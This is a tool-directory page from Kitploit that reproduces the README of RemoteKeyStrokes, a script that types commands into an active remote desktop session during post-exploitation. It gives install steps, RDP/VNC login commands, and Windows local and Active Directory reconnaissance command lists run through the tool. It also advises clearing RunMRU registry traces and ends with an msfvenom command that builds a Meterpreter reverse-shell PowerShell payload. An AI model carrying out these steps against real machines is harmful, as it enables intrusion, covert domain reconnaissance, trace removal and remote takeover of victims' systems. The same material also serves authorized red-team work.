Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/u53rw4r3/remotekeystrokes
Privilege EscalationPayload GenerationPersistence MechanismsLateral MovementPost-ExploitationPenetration TestingCommand and ControlRed Teaming
GitHubu53rw4r3/remotekeystrokes

RemoteKeyStrokes

A script to automate keystrokes through a graphical desktop program.

View Repository
354191 year agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

RemoteKeyStrokes

A script to automate keystrokes through an active remote desktop session that assists offensive operators in combination with living off the land techniques. All credits goes to nopernik for making it possible so I took it upon myself to improve it. I wanted something that helps during the post exploitation phase when executing commands through a remote desktop. It was also possible for making the SCPA project for collecting resources in a organized matter.

Features

  • Executing commands
  • File Transfer
  • Privilege Escalation (Coming soon)
  • Persistence (Coming soon)
  • Anti-Forensics (Coming soon)
  • Mayhem (Coming soon)

Installation

Dependencies

Install the rest of the dependencies according to your package mananger.

$ sudo apt install -y xfreerdp-x11 remmina xdotool

$ sudo dnf install -y xdotool freerdp-2 remmina

$ sudo pacman -S freerdp remmina xdotool

$ sudo emerge xwayland freerdp remmina xdotool

$ sudo nix-env -iA nixpkgs.xwayland nixpkgs.xdotool nixpkgs.freerdp nixpkgs.remmina

Setup

Install the program in the system and create rks as a symbolic link of remotekeystrokes. This will be used as an command alias.

$ sudo wget -O /usr/local/src/remotekeystrokes.sh https://raw.githubusercontent.com/U53RW4R3/RemoteKeyStrokes/main/remotekeystrokes.sh && \
sudo ln -sf /usr/local/src/remotekeystrokes.sh /usr/local/bin/remotekeystrokes && \
sudo ln -sf /usr/local/src/remotekeystrokes.sh /usr/local/bin/rks && \
sudo chmod 755 /usr/local/src/remotekeystrokes.sh /usr/local/bin/remotekeystrokes /usr/local/bin/rks

Help Menu

$ remotekeystrokes -h
Usage:
    remotekeystrokes <flags>

Flags:

COMMON OPTIONS:
    -c, --command <command | file>      Specify a command or a file contains commands
                                        to execute

    -p, --platform <operating_system>   Specify the operating system ("windows" is
                                        set by default if not specified)

    -w, --windowname <window_name>      Specify the window name to focus on the
                                        active window ("freerdp" is set by default
                                        if not specified)

    -h, --help                          Display this help message

UPLOAD FILES:
    -i, --input <input_file>            Specify the local input file to transfer
    -o, --output <output_file>          Specify the remote output file to transfer

METHODS:
    -m, --method <method>               Specify a method. For command execution method
                                        "none" is set by default if not specified.
                                        For file transfer "pwshb64" is set by default
                                        if not specified. Other available methods are:
                                        "elevate", "persistence", "antiforensics", and
                                        "mayhem"

    -s, --submethod <submethod>         Specify a submethod from a method (applies
                                        with -m flag)

    -a, --action <action>               Specify an action from a method and/or
                                        submethod (applies with -m and/or -s flag)

    -e, --evasion <evasion>             Specify an evasion method for uploading files
                                        (only works for "pwshb64")

Usage

0x00 - Remote Authentication

Legends

  • Dollar sign ($) indicates a unix shell prompt with normal user privileges, and it includes commands.

  • Angle brackets (<>) means mandatory parameters.

  • Square brackets ([]) means optional parameters if not required to specify.

RDP

To authenticate modern operating systems specify the flag either to force authentication as TLS /sec:tls or authentication as NLA /sec:nla.

$ xfreerdp /kbd:US /clipboard /compression /dynamic-resolution /sec:<tls | nla> [/d:"<domain_name>"] /u:"<username>" /p:"<password>" /v:<IP>:[<PORT>]

To authenticate legacy operating systems specify the flag /sec:rdp to force old authentication.

$ xfreerdp /kbd:US /clipboard /compression /dynamic-resolution /sec:rdp [/d:"<domain_name>"] /u:"<username>" /p:"<password>" /v:<IP>:[<PORT>]

VNC

To remotely authenticate a VNC machine.

$ remmina -c vnc://<username>:<password>@<IP>

SSH

$ ssh [-p <PORT>] <username>@<IP>

Telnet

$ telnet <IP> [PORT]

When using RemoteKeyStrokes

To use remotekeystrokes (or an alias command rks) when executing commands on the Windows target with authenticated remote session. Before executing them you must navigate it with a window name (-w) by default it'll search for FreeRDP when using xfreerdp. When targeting systems with a different remote login program be sure to specify the window name. Specify -c flag to issue commands. You can also prepare a text file to insert commands and it'll read them one by one. The flag will check if it's a string or a file.

For graphical remote desktop programs such as, FreeRDP, Remmina, and other third party programs. Unlike remote terminal sessions like telnet and ssh. You must navigate the cursor to an active application inside the target machine. For instance in Windows environment you must open a command prompt (cmd.exe) or powershell (powershell.exe). It is possible for Windows to open programs with a dialogue box (-m dialogbox) for a quick launch. Ensure to clear traces from the registry entry when you initially executed with the method. It's located in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU. You'll see examples of how you'll be able to perform quick offensive measures with just Living off the Land (LotL) techniques.

0x01 - Internal Reconnaissance

Command Prompt

Local machine enumeration.

$ cat recon_local_enum_cmds.txt
whoami /all
net user
net localgroup Administrators
ipconfig /all
systeminfo

$ rks -c "cmd.exe" -m dialogbox
[*] Checking one of the lines reaches 260 character limit
[*] Executing commands...
[+] Task completed!

$ rks -c recon_local_enum_cmds.txt
[*] Executing commands...
[+] Task completed!

To execute in a single command. This is concise especially when using with a dialbog box.

$ rks -c "cmd.exe /k \"whoami /all & net user & net localgroup Administrators & ipconfig /all & systeminfo\"" -m dialogbox
[*] Checking one of the lines reaches 260 character limit
[*] Executing commands...
[+] Task completed!

Active directory enumeration.

$ cat recon_ad_enum_cmds.txt
net user /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain
net group "Domain Computers" /domain

$ rks -c "cmd.exe" -m dialogbox
[*] Checking one of the lines reaches 260 character limit
[*] Executing commands...
[+] Task completed!

$ rks -c recon_ad_enum_cmds.txt
[*] Executing commands...
[+] Task completed!

To execute in a single command. This is concise especially when using with a dialbog box.

$ rks -c "cmd.exe /k \"net user /domain & net group \"Domain Admins\" /domain & net group \"Enterprise Admins\" /domain & net group \"Domain Computers\" /domain\""
[*] Checking one of the lines reaches 260 character limit
[*] Executing commands...
[+] Task completed!

Powershell

Local machine enumeration (TODO)

$ cat recon_local_enum_cmdlets.txt

$ rks -c "powershell.exe" -m dialogbox

$ rks -c recon_local_enum_cmdlets.txt

Active directory enumeration (TODO)

$ cat recon_ad_enum_cmdlets.txt

$ rks -c "powershell.exe" -m dialogbox

$ rks -c recon_ad_enum_cmdlets.txt

0x02 - Execute Payload

Windows

Execute the payload while reading the contents of the powershell.

$ msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<IP> lport=<PORT> -f psh -o payload.ps1
Download Tool